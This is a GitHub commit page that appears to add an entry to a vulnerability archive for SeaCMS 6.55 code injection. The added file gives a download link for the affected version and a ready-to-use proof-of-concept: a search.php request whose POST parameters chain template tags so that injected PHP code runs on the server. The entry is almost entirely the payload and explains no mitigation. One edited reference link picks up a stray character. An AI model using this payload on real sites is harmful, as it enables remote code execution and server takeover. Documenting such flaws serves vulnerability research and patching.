seacms6.55

SecWiki · Jul 18, 2018 · cf56b28 · cf56b28
1 parent 88c17b6
commit cf56b28
Show file tree

Hide file tree

Showing 2 changed files with 19 additions and 1 deletion.
diff --git a/seacms/SeaCMS v6.45前台Getshell 代码执行/readme.md b/seacms/SeaCMS v6.45前台Getshell 代码执行/readme.md
@@ -25,7 +25,7 @@
 
 ## References
 
-[https://bbs.ichunqiu.com/thread-35085-1-1.html](https://bbs.ichunqiu.com/thread-35085-1-1.html)
+[https://bbs.ichunqiu.com/thread-35085-1-1.htmlß](https://bbs.ichunqiu.com/thread-35085-1-1.htm)
 
 [http://0day5.com/archives/4249/](http://0day5.com/archives/4249/)
 

diff --git a/seacms/seacms 6.55 代码注入漏洞/seacms6.55.md b/seacms/seacms 6.55 代码注入漏洞/seacms6.55.md
@@ -0,0 +1,18 @@
+## Affected Version 6.55
+
+链接:https://pan.baidu.com/s/1UmbsQjQ4o4JFtK1MLHtf3g  
+密码:k4x1
+
+## POC
+
+	http://192.168.0.6/seacms655/search.php?phpinfo(); 
+	post:
+	searchtype=5&searchword={if{searchpage:year}&year=:as{searchpage:area}}&area=s{searchpage:letter}&letter=ert{searchpage:lang}&yuyan=($_SE{searchpage:jq}&jq=RVER{searchpage:ver}&&ver=[QUERY_STRING]));/*
+
+![](http://opmi2ydgh.bkt.clouddn.com//18-7-18/40373679.jpg)
+
+## References
+
+[海洋CMS（SEACMS）新版本V6.55补丁仍可被绕过执行任意代码](http://www.freebuf.com/vuls/150303.html)
+
+[seacms 6.55 代码注入漏洞](https://github.com/SukaraLin/php_code_audit_project/blob/master/seacms/seacms%206.55%20%E4%BB%A3%E7%A0%81%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md)